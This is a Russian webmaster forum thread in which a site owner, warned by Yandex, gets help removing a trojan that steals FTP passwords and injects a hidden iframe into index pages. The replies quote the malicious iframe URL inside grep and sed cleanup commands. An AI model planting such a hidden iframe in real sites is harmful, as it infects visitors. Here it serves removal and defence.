Форум Практика оптимизации Частные вопросы - ранжирование, индексация, бан

Пришел ответ от Яндекса!

123
IndexSa
На сайте с 23.12.2005
Offline
205
IndexSa
#11

Всё просто, ищете троян

мозг находится в мире, а мир находится в мозгу
M
На сайте с 04.05.2007
Offline
4
mxsurikov
#12
AVV:
Попробуйте начать отсюда:

/ru/forum/158983
/ru/forum/158354
/ru/forum/156664
/ru/forum/156443
/ru/forum/156332

Все нашел. Потом как я понял нужно поменять все пороли и проверить комп на вирусы. И последнее протокол нарушил именно вирус?🙄

M
На сайте с 04.05.2007
Offline
4
mxsurikov
#13
IndexSa:
Всё просто, ищете троян

Спасибо. Он только на главной может быть?

AVV
На сайте с 31.07.2006
Offline
84
AVV
#14
mxsurikov:
И последнее протокол нарушил именно вирус?

Да, именно вирус. Удачи.

mxsurikov:
Спасибо. Он только на главной может быть?

Этого я не знаю. :)

M
На сайте с 04.05.2007
Offline
4
mxsurikov
#15
AVV:
Да, именно вирус. Удачи.



Этого я не знаю. :)

<p align="center"><a href="http://top100.rambler.ru/top100/"><img height="31" alt="Rambler's Top100" width="88" border="0" src="http://top100-images.rambler.ru/top100/b8.gif" /> <!--end of Top100 logo --></a></p>

   </div>

	<div style="float: right;">

	<!--begin of Rambler's Top100 code -->

	<a href="http://top100.rambler.ru/top100/">

	<img src="http://counter.rambler.ru/top100.cnt?1064418" alt="" width=1 height=1 border=0></a>

	<!--end of Top100 code-->

	</div>

   <div class="clear"></div>

</div>





</body>

</html>

Я смотрю и уменя так, нет его в низу, как вы его нашли??? Я через Грин браузер смотрю и через просмотр HTML.

AVV
На сайте с 31.07.2006
Offline
84
AVV
#16
mxsurikov:

Я смотрю и уменя так, нет его в низу, как вы его нашли???

Ну, возьмите программу, например http://iocsha.narod.ru/header_v1.zip

и сделайте GET-запрос. Получите исходный код.

M
На сайте с 04.05.2007
Offline
4
mxsurikov
#17
AVV:
Ну, возьмите программу, например http://iocsha.narod.ru/header_v1.zip
и сделайте GET-запрос. Получите исходный код.

Вот нашел, а как теперь его удалить?😕

Roman Shalaev
На сайте с 30.10.2003
Offline
144
Roman Shalaev
#18

меняйте пароли на ftp, новые НЕ забивайте в тоталкоммандер или какой-либо другой ftp_клиент, т.к. троян их из программ этих и берет.

если у вас есть доступ к серверу по ssh, почистить будет проще.

Вроде прописывается эта дрянь только в index с любым расширением, но на всякий случай, все лучше проверить.

Делаете резервную копию всех файлов своего сайта.

Ищем, только ли в index-ах у нас этот код:

grep -r "http://fncarp.com/ind.php" *

если только в индексах, то ищите этот кусок и автоматом же заменяете его на пустое значение с помощью такого shell-скрипта:

for i in `find . -name index.\*`; do cp -p $i $i.old; cat $i.old | sed -e "s|\<iframe src\=\"http\:\/\/fncarp\.com\/ind\.php\" width\=\"1\" height\=\"1\" alt\=\"BYDLOSHKA\"\>\<\/iframe\>| |g" > $i; done

P.S.

это все в одну строку должно быть!

если в каких-то еще файлах есть, то `find . -type f` сделайте

так он все файлы просмотрит.

если ssh нет и сайт большой, сочувствую, хотя, по идее, можно скачать бэкап на локальный комп и в Dreamweaver использовать функцию найти и заменить в файлах.

удачи

Помогите разобраться с вирусами Что-то странное творится JS.Siggen.192
M
На сайте с 04.05.2007
Offline
4
mxsurikov
#19
ZAG:
меняйте пароли на ftp, новые НЕ забивайте в тоталкоммандер или какой-либо другой ftp_клиент, т.к. троян их из программ этих и берет.

если у вас есть доступ к серверу по ssh, почистить будет проще.
Вроде прописывается эта дрянь только в index с любым расширением, но на всякий случай, все лучше проверить.
Делаете резервную копию всех файлов своего сайта.

Ищем, только ли в index-ах у нас этот код:
grep -r "http://fncarp.com/ind.php" *

если только в индексах, то ищите этот кусок и автоматом же заменяете его на пустое значение с помощью такого shell-скрипта:

for i in `find . -name index.\*`; do cp -p $i $i.old; cat $i.old | sed -e "s|\<iframe src\=\"http\:\/\/fncarp\.com\/ind\.php\" width\=\"1\" height\=\"1\" alt\=\"BYDLOSHKA\"\>\<\/iframe\>| |g" > $i; done

P.S.
это все в одну строку должно быть!

если в каких-то еще файлах есть, то `find . -type f` сделайте
так он все файлы просмотрит.

если ssh нет и сайт большой, сочувствую, хотя, по идее, можно скачать бэкап на локальный комп и в Dreamweaver использовать функцию найти и заменить в файлах.

удачи

Спасибо, а доступ по ssh можно наладить? У меня фтп и как я понял мне нужно скачать все индексы на лок диск и дрим вавером прочистить. Угу. А как же в будущем? Мне ведь надо будет заливать по фтп файлы. У меня стоит смарт фтп. Косперским можно защитить соединение же.

Easy-share.com до $40 c Есть база фильмов.Как залить Существует ли хостинг для
VladiZlav
На сайте с 06.04.2006
Offline
214
VladiZlav
#20
mxsurikov:
Спасибо. Он только на главной может быть?

Не знаю как данный конкретный вирус, но подобного рода вирусы могут заражать и другие страницы. Не так давно по собственному недосмотру столкнулся с подобным вирусом, так он заражал все файлы с расширениями *.php *.htm и т.д. в корневой директории сайта и в папках "news" и "forum" 🚬 Гадость конечно редкостная, но блин мой антивирь ее както пропустил... 🙄

Яндекс выпустил антивирус для Устройство антивирусной системы Яндекса Google вебмастерам о безопасности
123

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий